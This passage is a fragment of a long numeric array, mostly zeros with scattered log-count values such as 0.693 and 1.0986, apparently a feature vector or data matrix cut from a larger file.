0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 4.564348191467836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.784189633918261, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0,\n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.9957322735539913, 0.0, \n 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0, 1.6094379124341003, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 2.995732273553991, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0, 0.0, 0, 1.9459101490553132, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 4.204692619390966, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 3.9384838577066197, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 1.9459101490553132, 3.295836866004329, 0, \n 3.9889840465642745, 0, 0.0, 0, 0.0, 0, 0.0, 1.791759469228055, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.390770307485499, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 10.55570332597337, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.356708826689592, 0.0, 0, 0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.4849066497880004, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.58351893845611, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9318256327243257, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 3.258096538021482, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 3.7369991058576035, 0.0, \n 2.302585092994046, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 